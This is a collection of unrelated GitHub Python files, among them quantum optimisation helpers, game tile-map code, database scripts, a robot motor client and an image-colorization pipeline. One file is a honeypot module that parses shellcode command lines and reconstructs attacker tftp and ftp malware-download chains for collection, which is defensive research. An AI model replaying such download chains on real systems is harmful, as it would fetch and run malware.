len(graph)\n try:\n keylist = np.unique(np.array([key for key in qubo]).flatten())\n params[\"total_qubits\"] = len(keylist)\n except:\n params[\"total_qubits\"] = len(qubo.todense().tolist())\n params[\"max_edges\"] = max(neighbors.values())\n params[\"adjacency\"] = [list(i) for i in list(graph)]\n params[\"adjacency_hash\"] = hashlib.md5(\n str(np.sort(list(graph))).replace(\" \", \"\").encode(\"utf-8\")\n ).hexdigest()\n return params\n\n\ndef experiment_summary(machine, settings, penalty, chain_strength, tag):\n params = dict()\n params[\"machine\"] = machine\n params[\"settings\"] = {\n key: settings[key] for key in settings if key not in [\"anneal_offsets\"]\n }\n params[\"p\"] = penalty\n params[\"chain_strength\"] = chain_strength\n params[\"tag\"] = tag\n params[\"settings_hash\"] = hashlib.md5(\n str([[key, params[\"settings\"][key]] for key in sorted(params[\"settings\"])])\n .replace(\" \", \"\")\n .encode(\"utf-8\")\n ).hexdigest()\n return params\n\n\ndef data_summary(raw, graph_params, experiment_params):\n params = dict()\n params[\"spin_config\"] = raw.iloc[:, : graph_params[\"total_qubits\"]].values\n params[\"energy\"] = (\n raw[\"energy\"].values + experiment_params[\"p\"] * graph_params[\"total_vertices\"]\n 
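# Added note (editor, hedged): shifting by p * total_vertices appears to cancel\n    # the constant penalty term, so the stored energy equals the selected-vertex\n    # count exactly when all constraints hold (checked via constraint_satisfaction\n    # below)\n    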
)\n #params[\"chain_break_fraction\"] = raw[\"chain_break_fraction\"].values\n params[\"constraint_satisfaction\"] = np.equal(\n params[\"energy\"],\n np.sum(params[\"spin_config\"][:, : graph_params[\"total_vertices\"]], axis=1),\n )\n return params\n\n\ndef QUBO_to_Ising(Q):\n q = np.diagonal(Q)\n QD = np.copy(Q)\n for i in range(len(QD)):\n QD[i, i] = 0.0\n QQ = np.copy(QD + np.transpose(QD))\n J = np.triu(QQ) / 4.0\n uno = np.ones(len(QQ))\n h = q / 2 + np.dot(QQ, uno) / 4\n g = np.dot(uno, np.dot(QD, uno)) / 4.0 + np.dot(q, uno) / 2.0\n # 0-1 basis transform\n h=(-1)*h\n return (J, h, g)\n\ndef Ising_to_QUBO(J, h):\n Q = None\n return Q\n","repo_name":"cchang5/quantum_linear_programming","sub_path":"qlp/mds/mds_qlpdb.py","file_name":"mds_qlpdb.py","file_ext":"py","file_size_in_byte":14965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12571255700","text":"from typing import Any, Dict, Optional\n\nimport pytiled_parser.tiled_object\nfrom arcade import (\n SpriteList,\n TileMap\n)\n\nfrom isometric import isolist\n\n\nclass IsoTileMap(TileMap):\n\n def _calculate_sprite_position(self, sprite, column, row, scaling):\n if self.tiled_map.orientation == \"isometric\":\n sprite.center_x, sprite.center_y = isolist.to_isometric_square(column, row, scaling,\n self.tiled_map.map_size,\n self.tiled_map.tile_size)\n else:\n sprite.center_x = (\n column * (self.tiled_map.tile_size[0] * scaling)\n + sprite.width / 2\n )\n sprite.center_y = (\n self.tiled_map.map_size.height - row - 1\n ) * (self.tiled_map.tile_size[1] * scaling) + sprite.height / 2\n\n def _process_tile_layer(\n self,\n layer: pytiled_parser.TileLayer,\n scaling: float = 1.0,\n use_spatial_hash: Optional[bool] = None,\n hit_box_algorithm: str = \"Simple\",\n hit_box_detail: float = 4.5,\n custom_class: Optional[type] = None,\n custom_class_args: Dict[str, Any] = {},\n ) -> isolist.IsoList:\n\n sprite_list: isolist.IsoList = isolist.IsoList(use_spatial_hash=use_spatial_hash)\n map_array = layer.data\n\n # Loop through the layer and add in the list\n for row_index, row in enumerate(map_array):\n for column_index, item in enumerate(row):\n # Check for an empty tile\n if item == 0:\n continue\n\n tile = self._get_tile_by_gid(item)\n if tile is None:\n raise ValueError(\n (\n f\"Couldn't find tile for item {item} in layer \"\n f\"'{layer.name}' in file '{self.tiled_map.map_file}'\"\n f\"at ({column_index}, {row_index}).\"\n )\n )\n\n my_sprite = self._create_sprite_from_tile(\n tile,\n scaling=scaling,\n hit_box_algorithm=hit_box_algorithm,\n hit_box_detail=hit_box_detail,\n custom_class=custom_class,\n custom_class_args=custom_class_args,\n )\n\n if my_sprite is None:\n print(\n f\"Warning: Could not create sprite number {item} in layer '{layer.name}' {tile.image}\"\n )\n else:\n self._calculate_sprite_position(my_sprite, column_index, row_index, scaling)\n\n # Tint\n if layer.tint_color:\n my_sprite.color = layer.tint_color\n\n # Opacity\n opacity = layer.opacity\n if opacity:\n my_sprite.alpha = int(opacity * 255)\n\n sprite_list.visible = layer.visible\n sprite_list.append(my_sprite)\n\n return sprite_list\n","repo_name":"DragonMoffon/IsoCade","sub_path":"isometric/isomap.py","file_name":"isomap.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9906716636","text":"import pathlib\nimport unittest\nfrom akicnpj.downloader import AkiMunicipioDownloader\nfrom 
akicnpj.extractor import AkiExtractor\nfrom akicnpj.object.table.municipio import AkiMunicipio\nfrom akicnpj.reader import AkiMunicipioReader\nfrom akicnpj.finder import AkiFinder\n\nROOT = pathlib.Path(__file__).parent.parent\nDATA_PATH = ROOT.joinpath(\"data\")\nEXTRACT_PATH = DATA_PATH.joinpath(\"extract\")\n\n\nclass MunicipioTestCase(unittest.TestCase):\n zip_files = []\n\n def test_download(self):\n files = list(AkiMunicipioDownloader().download())\n self.assertGreater(len(files), 0)\n\n for file in files:\n self.assertIsInstance(file, pathlib.Path)\n self.zip_files.append(file)\n\n def test_extractor(self):\n self.assertGreater(len(self.zip_files), 0)\n\n for file in self.zip_files:\n self.assertTrue(AkiExtractor().run(input_path=file))\n\n def test_find_and_read(self):\n for file in AkiFinder(path=EXTRACT_PATH).search():\n if file.category == file.category.CITY:\n with AkiMunicipioReader(file.path, encoding=\"iso-8859-1\") as reader:\n for row in reader.rows:\n self.assertIsInstance(row, AkiMunicipio)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"4U360/Aki-CNPJ","sub_path":"tests/municipio.py","file_name":"municipio.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5650593077","text":"import unreal\n \n# WARNING - UE4 has a bug in FBX export\n# the export of hierarchy should be controled by the editor preference 'Keep Attach Hierarchy'\n# but in the code the value of this setting is not checked and the actual variable controling this is uninitialized\n# which leads to different behaviors on different sessions... you may or may not get your hierarchy in the FBX...\n \noutput_file = 'C:\\\\Temp\\\\ue4_output.fbx'\n \nselected_actors = unreal.EditorLevelLibrary.get_selected_level_actors()\nif len(selected_actors) == 0:\n print(\"No actor selected, nothing to export\")\n quit()\n \ntask = unreal.AssetExportTask()\ntask.object = selected_actors[0].get_world()\ntask.filename = output_file\ntask.selected = True\ntask.replace_identical = False\ntask.prompt = False\ntask.automated = True\ntask.options = unreal.FbxExportOption()\ntask.options.vertex_color = False\ntask.options.collision = False\ntask.options.level_of_detail = False\nunreal.Exporter.run_asset_export_task(task)","repo_name":"ue4plugins/PythonSamples","sub_path":"scripts/ImportExport/Export_selected_actors_to_FBX.py","file_name":"Export_selected_actors_to_FBX.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"32"} +{"seq_id":"7129404434","text":"import sqlite3\n\n#create a connection (a connection object) the db\nmyConn = sqlite3.connect(\"parkrun_db.db\")\n\n# create a cursor\nmyCursor = myConn.cursor()\n\nSQLStatement = \"\"\n\n#list the fields in a dictionary. 
the key is the field name\n#the value is the list of parameters for that field\nChaptersfields =\t{\n \"ChapterID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"ChapterName\":\"TEXT NOT NULL\",\n \"ChapterAddress\":\"TEXT NOT NULL\",\n \"ChapterPhoto\":\"TEXT\",\n \"ChapterEmail\":\"TEXT NOT NULL\",\n \"CourseMap\":\"TEXT\",\n \"CourseDescription\":\"BLOB\",\n \"Facilities\":\"BLOB\",\n \"LocationOfStart\":\"TEXT NOT NULL\",\n \"GettingTherePublicTransport\":\"BLOB\",\n \"GettingThereFoot\":\"BLOB\",\n \"GettingThereRoad\":\"BLOB\"\n }\n\nRunnersfields = {\n \"RunnerID\": \"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"RegistrationDate\": \"TIMESTAMP DEFAULT CURRENT_TIMESTAMP\",\n \"FirstName\": \"TEXT\",\n \"LastName\": \"TEXT\",\n \"HomeRun\": \"INTEGER\",\n \"Gender\": \"INTEGER\",\n \"RunningClubID\": \"INTEGER\",\n \"Email\": \"TEXT\",\n \"Postcode\": \"TEXT\",\n \"SignUpToEmails\": \"INTEGER DEFAULT 1\",\n \"RecentExerciseFrequency\": \"INTEGER\",\n \"MedicalCondition\": \"BLOB\",\n \"EmergencyContactName\": \"TEXT\",\n \"EmergencyContactNumber\": \"TEXT\"\n }\n\nClubsfields = {\n \"RunningClubID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"RunningCLubName\":\"TEXT NOT NULL\"\n }\n\nRecentexercisefrequencyfields = {\n \"RecentExerciseFrequencyID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"RecentExerciseDescription\":\"TEXT NOT NULL\"\n }\n\nEventsfields={\n \"EventID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"EventDate\":\"TIMESTAMP DEFAULT CURRENT_TIMESTAMP\",\n \"RunnerID\":\"INTEGER NOT NULL\",\n \"RunnerTime\":\"INTEGER NOT NULL\",\n \"ChapterID\":\"INTEGER NOT NULL\"\n }\n\nResultsfields={\n \"ResultID\":\"INTEGER PRIMARY KEY AUTOINCREMENT\",\n \"RunnerID\":\"INTEGER\",\n \"Time\":\"TEXT\",\n \"EventID\":\"INTEGER\"\n}\n\nsql_statement = \"CREATE TABLE \\\"\"\n#Start building the SQL statement with the name of the table\ndef createTable(tablename, fields):\n sql_statement = \"CREATE TABLE \\\"\"\n sql_statement += tablename + \"\\\" (\"\n\n for x in fields:\n sql_statement += \"\\\"\"+x+\"\\\" \"+fields[x]+\",\"\n #Trim the trailing \"'\" and add a closing parenthesis\n return sql_statement[:-1]+\")\"\n\n\n#Execute the SQL Statement\n# myCursor.execute(createTable(\"Chapters\",Chaptersfields))\n# myCursor.execute(createTable(\"Runners\",Runnersfields))\n# myCursor.execute(createTable(\"Events\",Eventsfields))\n# myCursor.execute(createTable(\"Clubs\",Clubsfields))\n# myCursor.execute(createTable(\"RecentExerciseFrequency\",Recentexercisefrequencyfields))\nmyCursor.execute(createTable(\"Results\",Resultsfields))\n\n","repo_name":"SolutionsDigital/Unit-2","sub_path":"Parkrun_Example/create_parkrun_tables.py","file_name":"create_parkrun_tables.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70822783770","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2023/4/27 下午3:37\n@file: anchors.py\n@author: zj\n@description: \n\"\"\"\n\nimport torch\nimport torch.nn.functional as F\n\n\ndef test_scale():\n a = torch.randn(3, 4)\n b = torch.randn(3, 4)\n\n mask = torch.ones(3, 4)\n mask *= 0.5\n mask[1] = 5\n\n aa = a * mask\n bb = b * mask\n loss1 = F.mse_loss(aa, bb, reduction='sum')\n\n aa1 = a[mask == 0.5]\n bb1 = b[mask == 0.5]\n loss2 = F.mse_loss(aa1, bb1, reduction='sum')\n\n aa2 = a[mask == 5]\n bb2 = b[mask == 5]\n loss3 = F.mse_loss(aa2, bb2, reduction='sum')\n\n assert (loss1 - (loss2 * 0.5 * 0.5 + loss3 * 5 * 5)) < 1e-3\n\n loss4 = F.mse_loss(aa1 * 0.5, bb1 * 0.5, 
reduction='sum')\n loss5 = F.mse_loss(aa2 * 5, bb2 * 5, reduction='sum')\n assert (loss1 - (loss4 + loss5)) < 1e-3\n\n\nif __name__ == '__main__':\n test_scale()\n","repo_name":"zjykzj/YOLOv2","sub_path":"tests/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28576271407","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 25 15:00:42 2023\n\n@author: ZHU\n\"\"\"\n\nimport psycopg2\nimport numpy as np\nfrom tqdm import tqdm\nimport pandas as pd\n\n# Establish a connection to the PostgreSQL database\nconn = psycopg2.connect(\n host=\"127.0.0.1\",\n database=\"postgres\",\n user=\"postgres\",\n password=\"password\"\n)\n\n# Create a cursor object\ncur = conn.cursor()\n\n# Update the table with the values in the dataframe\nlogs = {'order_id': [], 'existing': [], 'updated': [], 'type': [], 'sql_query': []}\n\ntel_data = pd.read_pickle('update_tel.pkl')\n\nfor index, row in tqdm(tel_data.iterrows(), total=len(tel_data)):\n order_id = index\n # tel = row['receiver_mobile'].tolist()\n tel = row['receiver_mobile']\n \n cur.execute(\"SELECT tel FROM tb_privacy_data WHERE order_id = %s\", (order_id,))\n result = cur.fetchone()\n if result is not None:\n # Update existing record\n existing = result[0]\n if existing is None:\n existing = []\n \n new = list(set(tel) - set(existing))\n if len(new) > 0:\n updated = existing + new\n \n logs['order_id'].append(order_id)\n logs['existing'].append(existing)\n logs['updated'].append(updated)\n logs['type'].append('update')\n \n sql_query = \"UPDATE tb_privacy_data SET tel = %s WHERE order_id = %s\"\n params = (updated, order_id)\n logs['sql_query'].append(sql_query % params)\n # cur.execute(sql_query, params)\n \n else:\n # Insert new record\n logs['order_id'].append(order_id)\n logs['existing'].append(np.nan)\n logs['updated'].append(tel)\n logs['type'].append('insert')\n \n sql_query = \"INSERT INTO tb_privacy_data (order_id, tel) VALUES (%s, %s)\"\n params = (order_id, tel)\n logs['sql_query'].append(sql_query % params)\n # cur.execute(sql_query, params)\n \nconn.commit()\ncur.close()\nconn.close()","repo_name":"chineseskin/tb-order-privacy-related-data-db","sub_path":"update_tel_one_by_one.py","file_name":"update_tel_one_by_one.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30018641337","text":"\ndef count_missing_nums(lst):\n nums = []\n for i in lst:\n try:\n nums.append(int(i))\n except:\n continue\n solution = 0\n for i in range(min(nums), max(nums)):\n if i not in nums:\n solution += 1\n return solution\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"vBwRuR4mF5yQ4cNuc_18.py","file_name":"vBwRuR4mF5yQ4cNuc_18.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41626564482","text":"\n#? This is the client motor file\n#? 
It connects to the server and sends info about how to move the motor\nimport time\nimport socket\nfrom sys import exit\n\nBUFFER = 512\n\nclass Motor():\n    def __init__(self, addr):\n        self.connectMotor(addr)\n    \n    def connectMotor(self, addr):\n        try:\n            self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            self.client.connect(addr)\n        except ConnectionRefusedError:\n            print(\"Server has not started!\")\n            exit(-1)\n\n    def moveMotor(self, direction):\n        if direction == 'forward':\n            direction ='F'\n        elif direction == 'backward':\n            direction='B'\n        elif direction=='left':\n            direction='L'\n        elif direction=='right':\n            direction='R'\n        elif direction == 'stop':\n            direction='S'\n\n        self.client.send(str(direction).encode('ascii'))","repo_name":"shreyanshsaha/MarsRoverCSE","sub_path":"Autonomous Versions/Autonomous/motorClient.py","file_name":"motorClient.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"17662164093","text":"from mwcollectd import *\n\n\nclass ShellcodeProcessHandler:\n\tdef __init__(self, name, event):\n\t\tif 'commandline' not in event or 'recorder' not in event:\n\t\t\treturn\n\n\t\tself.vfiles = { }\n\n\t\tself.parse( event['commandline'].decode('latin1'), event['recorder'] )\n\n\n\tdef parse(self, cmd, recorder):\n\t\tcommands = [ ]\n\t\tcurr = ''\n\t\tescaping = False\n\t\tseparators = frozenset( ['|', '&'] )\n\n\t\tfor c in cmd:\n\t\t\tif not escaping:\n\t\t\t\tif c == '^':\n\t\t\t\t\tescaping = True\n\t\t\t\telif c in separators:\n\t\t\t\t\tif len(curr) > 0:\n\t\t\t\t\t\tcommands.append(curr)\n\t\t\t\t\t\tcurr = ''\n\t\t\t\telse:\n\t\t\t\t\tcurr += c\n\t\t\telse:\n\t\t\t\tcurr += c\n\t\t\t\tescaping = False\n\n\t\tif len(curr) > 0:\n\t\t\tcommands.append(curr)\n\n\t\tparsed_commands = [ ]\n\n\t\tfor cmd in commands:\n\t\t\tquoter = None\n\t\t\tquotes = frozenset( [\"'\", '\"'] )\n\t\t\tseparators = frozenset( [' ', '\\t', ',', ';'] )\n\t\t\tcurr = ''\n\t\t\tccmd = [ ]\n\n\t\t\tfor c in cmd:\n\t\t\t\tif not quoter:\n\t\t\t\t\tif c in quotes and len(curr) == 0:\n\t\t\t\t\t\tquoter = c\n\t\t\t\t\telif c in separators:\n\t\t\t\t\t\tif len(curr) > 0:\n\t\t\t\t\t\t\tccmd.append(curr)\n\t\t\t\t\t\t\tcurr = ''\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurr += c\n\t\t\t\telse:\n\t\t\t\t\tif c == quoter:\n\t\t\t\t\t\tquoter = None\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurr += c\n\n\t\t\tif len(curr) > 0:\n\t\t\t\tccmd.append(curr)\n\n\t\t\tparsed_commands.append(ccmd)\n\n\t\treturn self.emulate(parsed_commands, recorder)\n\n\n\tdef emulate(self, commands, recorder):\n\t\tfor command in commands:\n\t\t\tif command[0] == 'tftp' or command[0] == 'tftp.exe':\n\t\t\t\t(url, localfile) = self.url_TFTP(command[1:])\n\n\t\t\t\tif url:\n\t\t\t\t\tdispatchEvent('shellcode.download', { 'url': url,\n\t\t\t\t\t\t'localfile': localfile, 'recorder': recorder } )\n\t\t\telif command[0] == 'cmd' and len(command) > 2 and command[1] == '/c':\n\t\t\t\tself.emulate([command[2:]], recorder)\n\t\t\telif command[0] == 'echo':\n\t\t\t\tline = ''\n\n\t\t\t\tfor word in command[1:]:\n\t\t\t\t\tif word == '>':\n\t\t\t\t\t\tself.vfiles[command[-1]] = line + '\\n'\n\t\t\t\t\telif word == '>>':\n\t\t\t\t\t\tif command[-1] not in self.vfiles:\n\t\t\t\t\t\t\tself.vfiles[command[-1]] = ''\n\n\t\t\t\t\t\tself.vfiles[command[-1]] += line + '\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\tif line != '':\n\t\t\t\t\t\t\tline += ' '\n\n\t\t\t\t\t\tline += word\n\t\t\telif command[0] == 'ftp' or command[0] == 'ftp.exe':\n\t\t\t\tfor param in 
command[1:]:\n\t\t\t\t\tif param[:3] == '-s:':\n\t\t\t\t\t\tinstrs = self.vfiles[param[3:]].split('\\n')\n\n\t\t\t\t\t\thost = None\n\t\t\t\t\t\tport = 21\n\t\t\t\t\t\tuser = 'anonymous'\n\t\t\t\t\t\tpasswd = 'secret'\n\n\t\t\t\t\t\tfor instr in instrs:\n\t\t\t\t\t\t\tw = instr.split(' ')\n\n\t\t\t\t\t\t\tif w[0] == 'open':\n\t\t\t\t\t\t\t\thost = w[1]\n\t\t\t\t\t\t\t\tport = int(w[2])\n\t\t\t\t\t\t\telif w[0] == 'user':\n\t\t\t\t\t\t\t\tuser = w[1]\n\n\t\t\t\t\t\t\t\tif len(w) >= 3:\n\t\t\t\t\t\t\t\t\tpasswd = w[2]\n\t\t\t\t\t\t\telif w[0] == 'get':\n\t\t\t\t\t\t\t\tfilename = ' '.join(w[1:])\n\n\t\t\t\t\t\t\t\tif filename[:1] == '/':\n\t\t\t\t\t\t\t\t\tfilename = filename[1:]\n\n\t\t\t\t\t\t\t\turl = 'ftp://%s:%s@%s:%i/%s' % (user, passwd, host, port, filename)\n\t\t\t\t\t\t\t\tlog(L_SPAM, 'FTP Download via shell: ' + url)\n\n\t\t\t\t\t\t\t\tdispatchEvent('shellcode.download', {\n\t\t\t\t\t\t\t\t\t\t'url': url,\n\t\t\t\t\t\t\t\t\t\t'localfile': filename,\n\t\t\t\t\t\t\t\t\t\t'recorder': recorder\n\t\t\t\t\t\t\t\t\t})\n\n\n\tdef url_TFTP(self, command):\n\t\twhile len(command) > 0 and command[0][0] == '-':\n\t\t\tcommand = command[1:]\n\n\t\tif len(command) != 3:\n\t\t\treturn None\n\n\t\tif command[1] not in ['get', 'put']:\n\t\t\treturn None\n\n\t\treturn ('tftp://' + command[0] + '/' + command[2], command[2])\n\n\ndef start(config):\n\tglobal process_handler\n\tprocess_handler = EventSubscription('shellcode.process', ShellcodeProcessHandler)\n\treturn process_handler.register()\n\n\ndef stop():\n\tglobal process_handler\n\treturn process_handler.unregister()\n","repo_name":"oxff/mwcollectd","sub_path":"src/embed-python/modules/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"2372163830","text":"#===================================================================\n#    Purpose:   Demonstrate basic Python programming in \n# for Lists and Functions\n#===================================================================\n\n# Function to to display temperatures\ndef DisplayTemperatures(HourlyTemperatures, AverageTemp):\n lowTemp = 0\n highTemp = 0\n\n # Get low temperature\n for value in HourlyTemperatures:\n if (lowTemp == 0) or (lowTemp > value):\n lowTemp = value\n\n # Get high temperature\n for value in HourlyTemperatures:\n if (highTemp == 0) or (highTemp < value):\n highTemp = value\n\n # Print all values =================\n\n print(\"\")\n print(\"Hour\\t\\tTemperature\")\n print(\"\")\n\n for index in range(0, len(HourlyTemperatures)):\n print(str((index + 1)).rjust(2, \"0\"), \": 00\\t\\t\", HourlyTemperatures[index])\n\n print(\"\")\n print(\"High Temperature: \\t\", highTemp)\n print(\"Low Temperature: \\t\", lowTemp)\n print(\"Average Temperature: \\t\", AverageTemp) \n print(\"\") \n\n# Function to calculate average temperature\ndef ComputeAverageTemp(HourlyTemperatures):\n totalValue = 0\n\n for value in HourlyTemperatures:\n totalValue += value\n\n return round((totalValue / len(HourlyTemperatures)), 1) \n\n# Function to get temperatures from user\ndef GetTemperatures(HourlyTemperatures):\n\n print(\"\")\n for index in range(0, 24):\n currentInput = int(input(\"Please enter value for slot \" + str((index + 1)) + \": \"))\n\n # Repeat call until we get the correct value\n while (currentInput < 50) or (currentInput > 130):\n currentInput = int(input(\"Please make sure the value is between 50 and 130 \" + str((index + 1)) + \": \"))\n\n 
HourlyTemperatures.append(currentInput)\n\n# Main function\ndef main():\n    HourlyTemperatures = []\n\n    GetTemperatures(HourlyTemperatures)\n    AverageTemp = ComputeAverageTemp(HourlyTemperatures)\n    DisplayTemperatures(HourlyTemperatures, AverageTemp) \n\nmain()","repo_name":"Talleth/PythonLists","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72512789532","text":"# dagster\nfrom dagster import solid, composite_solid, pipeline\n\n# other packages\nimport os\nimport logging\nfrom datetime import datetime\n\n# user-defined libraries\nfrom utils.backend import *\nfrom utils.commons import *\nfrom utils.image import *\nfrom utils.models import * \nfrom utils.utils import *\n\n@solid\ndef get_raw_image_path(context, raw_image_path: str):\n\tcontext.log.info(f\"raw_image_path is: {raw_image_path}\")\n\treturn raw_image_path\n\n@solid\ndef get_theme(context, theme: str):\n\tcontext.log.info(f\"theme is: {theme}\")\n\treturn theme\n\n@solid \ndef get_models(context, models):\n\tcontext.log.info(f\"models is: {models}\")\n\treturn models\n\n@solid\ndef preprocess_raw_image(context, raw_image_path):\n\n\treturn raw_image_path\n\n@solid\ndef execute_color_transfer_model_wrapper(context, raw_image_path: str, palette_path: str, model: str):\n\t# expected output: image array\n\t\n\tif model == PALETTENET:\n\t\treturn request_palettenet(raw_image_path, palette_path)\n\telif model == ITERATIVE_DISTRIBUTION_TRANSFER:\n\t\treturn request_iterative_distribution_transfer(raw_image_path, palette_path)\n\telse:\n\t\traise HTTPError\n\n@solid\ndef construct_output_object(context, segmentation_result_paths: list, color_picker_results: list):\n\toutput = {}\n\t\n\tfor index, (segmentation_result_path, color_picker_result) in enumerate(zip(segmentation_result_paths, color_picker_results)):\n\t\toutput_class = \"result_\" + str(index + 1)\n\n\t\toutput[output_class] = {}\n\t\toutput[output_class][\"image_path\"] = segmentation_result_path\n\t\toutput[output_class][\"colors\"] = color_picker_result\n\n\treturn output\n\n@composite_solid\ndef generate_palettes(theme: str) -> list:\n\t# get palettes from theme name\n\tpalettes = get_theme_palettes(theme)\n\tpalette_colors = {\n\t\t\"palette_1\": [p['colour_name'] for p in palettes['palette_1_colours']],\n\t\t\"palette_2\": [p['colour_name'] for p in palettes['palette_2_colours']],\n\t\t\"palette_3\": [p['colour_name'] for p in palettes['palette_3_colours']],\n\t}\n\tlogging.info(f\"Retrieved color names of {theme}: {palette_colors}\")\n\n\t# generate palette images using palettes\n\t# NOTE: `timestamp` was undefined in the original; derive one from the clock here\n\ttimestamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\tpalette_paths = []\n\tfor index in range(1, len(palette_colors) + 1):\n\t\tpalette_path = os.path.join(TEMP_DIR, f\"palette_{index}_{timestamp}.jpg\")\n\t\tpalette = generate_palette_image(palette_colors[f\"palette_{index}\"])\n\t\tpalette.save(palette_path)\n\n\t\tpalette_paths.append(palette_path)\n\n\t\tlogging.info(f'Retrieved palette image for: palette_{index}')\n\n\t# # result 3\n\t# palette_b_path = os.path.join(TEMP_DIR, 'palette_b.jpg')\n\t# palette_b = saturate_image(palette_path, 192)\n\t# cv2.imwrite(palette_b_path, palette_b)\n\n\treturn palette_paths\n\n@solid\ndef color_transfer(context, raw_image_path: str, palette_paths: list, models: list) -> list:\n\ttimestamp = get_timestamp_from_filepath(raw_image_path)\n\tdimensions = get_image_dimensions(raw_image_path)\n\n\tresult_paths = []\n\tfor index, (palette_path, model) in 
enumerate(zip(palette_paths, models)):\n\t\tindex = index + 1\n\n\t\tresult_path = os.path.join(TEMP_DIR, f\"colorized_{index}_{timestamp}.jpg\")\n\t\tresult = execute_color_transfer_model_wrapper(raw_image_path, palette_path, model)\n\t\tresult = result.resize(dimensions)\n\t\tresult.save(result_path)\n\n\t\tresult_paths.append(result_path)\n\n\treturn result_paths\n\n@solid\ndef segmentation(context, raw_image_path: str, new_image_paths: list) -> list:\n\ttimestamp = get_timestamp_from_filepath(raw_image_path)\n\n\t# call segmentation API once\n\tmask_path = os.path.join(TEMP_DIR, f\"mask_{timestamp}.png\")\n\tmask = segmentation_request(raw_image_path)\n\tmask.save(mask_path)\n\n\t# overlay results of segmentation API over results\n\tresult_paths = []\n\tfor index, new_image_path in enumerate(new_image_paths):\n\t\tresult_path = os.path.join(TEMP_DIR, f\"segmented_{index}_{timestamp}.jpg\")\n\t\tresult = apply_mask(raw_image_path, new_image_path, mask_path)\n\t\tresult.save(result_path)\n\n\t\tresult_paths.append(result_path)\n\n\treturn result_paths\n\n@solid\ndef color_picker(context, image_paths: list):\n\t# run color picker API on each segmented image\n\tresults = []\n\tfor image_path in image_paths:\n\t\tresult = request_color_picker(image_path)\n\n\t\tresults.append(result)\n\n\treturn results\n\n@solid\ndef super_resolution(context, image_paths: list):\n\tresult_paths = []\n\n\tfor index, image_path in enumerate(image_paths):\n\t\tresult_path = os.path.join(TEMP_DIR, 'superres_result_' + str(index) + '.jpg')\n\n\t\tresult = superres_request(image_path, result_path)\n\n\t\tresult_paths.append(result_path)\n\n\treturn result_paths\n\n@pipeline\ndef colorization_by_theme() -> dict:\n\t\"\"\"\n\traw_image_path: string, local path of image\n\ttheme: string, theme name\n\t\"\"\" \n\n\t# get timestamp from filepath\n\traw_image_path = get_raw_image_path()\n\ttheme = get_theme()\n\tmodels = get_models()\n\n\ttimestamp = get_timestamp_from_filepath(raw_image_path)\n\n\t# process raw image\n\traw_image = get_image(raw_image_path)\n\traw_image = proportionate_resize_image(image=raw_image)\n\traw_image = reduce_image_to_multiples(image=raw_image)\n\traw_image_path = save_image(raw_image, raw_image_path)\n\n\t# raw_image_path = preprocess_raw_image(raw_image_path)\n\tlogging.info(f\"Processed raw image: {raw_image_path}\")\n\n\t# generate palettes\n\tpalette_paths = generate_palettes(theme)\n\tlogging.info(f\"Generate palettes completed: {palette_paths}\")\n\n\t# color transfer\n\tcolor_transfer_result_paths = color_transfer(raw_image_path, palette_paths, models)\n\tlogging.info(f\"Color transfer completed: {color_transfer_result_paths}\")\n\n\t# segmentation\n\tsegmentation_result_paths = segmentation(raw_image_path, color_transfer_result_paths)\n\tlogging.info(f\"Segmentation completed: {segmentation_result_paths}\")\n\n\t# color picker\n\tcolor_picker_results = color_picker(segmentation_result_paths)\n\tlogging.info(f\"Color picker completed: {color_picker_results}\")\n\n\t# super resolution\n\t# super_resolution_result_paths = super_resolution(segmentation_result_paths)\n\t# logging.info(f\"Super resolution completed: {super_resolution_result_paths}\")\n\n\t# return results in json structure as base64 strings\n\tresults = construct_output_object(segmentation_result_paths, color_picker_results)\n\n\treturn 
